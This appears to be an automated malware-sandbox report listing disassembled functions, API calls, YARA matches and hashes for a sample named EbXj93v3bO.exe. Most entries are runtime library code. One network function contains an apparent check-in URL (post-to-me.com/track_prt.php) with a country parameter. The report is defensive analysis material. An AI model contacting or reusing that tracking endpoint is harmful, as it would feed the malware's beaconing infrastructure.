Download Yara Rule

APIs

GetLastError.KERNEL32(0251DAD7,0251DAD7,00000002,0253ED35,02543951,00000000,?,02536A05,00000002,00000000,00000000,00000000,?,0251CF88,0251DAD7,00000004), ref: 025421CA
_free.LIBCMT ref: 025421FF
_free.LIBCMT ref: 02542226
SetLastError.KERNEL32(00000000,?,0251DAD7), ref: 02542233
SetLastError.KERNEL32(00000000,?,0251DAD7), ref: 0254223C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: b4d4d723c5e7a326cac6b0508c7b5d76b13d7e4d84eaf1b06845b1aeecfe0213
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: E001F936249B223B93122B349C44F2AAA2EBBD177EF200634FC15D2290FFB0C801852D

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 02542141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
_free.LIBCMT ref: 02542178
_free.LIBCMT ref: 025421A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 8ac360de216d4fe9e03953c0d016e42de6568b4b4428fe873552c766c814207b
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: D3F0A93514471237D2162734EC09B1EBA2A7FC2B6EF211224FD14D22A0FF618502852D

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 02527B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 025229A4: TlsGetValue.KERNEL32(?,?,02520DC2,02522ECF,00000000,?,02520DA0,?,?,?,00000000,?,00000000), ref: 025229AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02527BB1

Part of subcall function 0253121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02531241
Part of subcall function 0253121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0253125A
Part of subcall function 0253121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 025312D0
Part of subcall function 0253121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 025312D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02527BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02527BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02527BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02527BF1

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: b80b108fbd390c45800149efdf77addd1f05cc954e81260e6fbdc480c00020d1
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 4DF0C23560063A67CB16F675C81096DFB2BBFC2B24F04516AEC00932D0EF259E0D8E99

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 0254A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0254A0C4

Part of subcall function 025436D1: HeapFree.KERNEL32(00000000,00000000,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?), ref: 025436E7
Part of subcall function 025436D1: GetLastError.KERNEL32(?,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?,?), ref: 025436F9

_free.LIBCMT ref: 0254A0D6
_free.LIBCMT ref: 0254A0E8
_free.LIBCMT ref: 0254A0FA
_free.LIBCMT ref: 0254A10C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: b358b49c26662f20edc64d3bce62d4187c94f16051133a8a635a876cd611eed0
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 4AF06232545211BB86A0EB54E8C2C16FBDABA4435C7740955F018DBB21CF71F8908E5D

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 02541991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 025419AF

Part of subcall function 025436D1: HeapFree.KERNEL32(00000000,00000000,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?), ref: 025436E7
Part of subcall function 025436D1: GetLastError.KERNEL32(?,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?,?), ref: 025436F9

_free.LIBCMT ref: 025419C1
_free.LIBCMT ref: 025419D4
_free.LIBCMT ref: 025419E5
_free.LIBCMT ref: 025419F6

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: a4b17eb795ad5db1ab41e8eb045a6082a3ba6ca9b8ae778b95c2cd26baf67d7c
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 33F03070D00722AB9F616F14ED80404BB61BF0976671002A6F416977B2CB74D9A2DF8E

Function 0252CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0252CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0252CF67
GetCurrentThread.KERNEL32 ref: 0252CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0252CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0252CF8C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 83d72cd5d44f60b1109c3c06a973b1e42a23c6a1fdacc2812488fc1059919c75
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 15F0A732201521EBC625EF20EA508BEB776BFC6611311454DD587066D1CF25A90EDB69

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 02512E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02512E8E

Part of subcall function 02511321: _wcslen.LIBCMT ref: 02511328
Part of subcall function 02511321: _wcslen.LIBCMT ref: 02511344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 025130A1

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 02512EBE, 02512FEA, 02513059
&cc=DE, xrefs: 0251301B, 02513021, 0251307E

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 4c7d3c658439ace6db793cc38d3f158ba93b44ec2f676ac00e633a6b0b793b1c
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 7E515195E65345A8E320EFB0FC56B7223B8FF58712F10643AD518CB2B2E7A19944871E

Function 02538937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0253896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02538A23

Strings

csm, xrefs: 02538A0D
fB, xrefs: 02538A15, 02538A1E, 02538A2F

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 5953b63f1e2e3755a77ee88b6120cbbb927f46ec4fd15106b502d3255cb91079
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 3B413630A00249EBCF15DF28C888AAEBFB1BF45328F149165F8155B391C732DA15CF99

Function 0253F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EbXj93v3bO.exe,00000104), ref: 0253F9BA
_free.LIBCMT ref: 0253FA85
_free.LIBCMT ref: 0253FA8F

Strings

C:\Users\user\Desktop\EbXj93v3bO.exe, xrefs: 0253F9B1, 0253F9B8, 0253F9E7, 0253FA1F

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\EbXj93v3bO.exe
API String ID: 2506810119-93015994
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: ab713ff726985f45df0921569a29eea71a067e84daa7b5bb5beb79dbf5739cc1
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 5F318D71E04259FBDB22DF99DC80D9EBBFDFF89310B105066E80897221D7709A40CBA8

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EbXj93v3bO.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\EbXj93v3bO.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\EbXj93v3bO.exe
API String ID: 2506810119-93015994
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0251C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0251C8DE

Strings

ios_base::failbit set, xrefs: 0251C8AB
ios_base::eofbit set, xrefs: 0251C8B0
ios_base::badbit set, xrefs: 0251C8A1, 0251C8C1

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: f57757433053eb791b121f85160b2f6b8401eab5ff5ff601e57836ebb58c5aee
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: BDF021738802087AEB04E554CC81BFA7754BB45327F04846BED42A7082E7669905CB6E

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

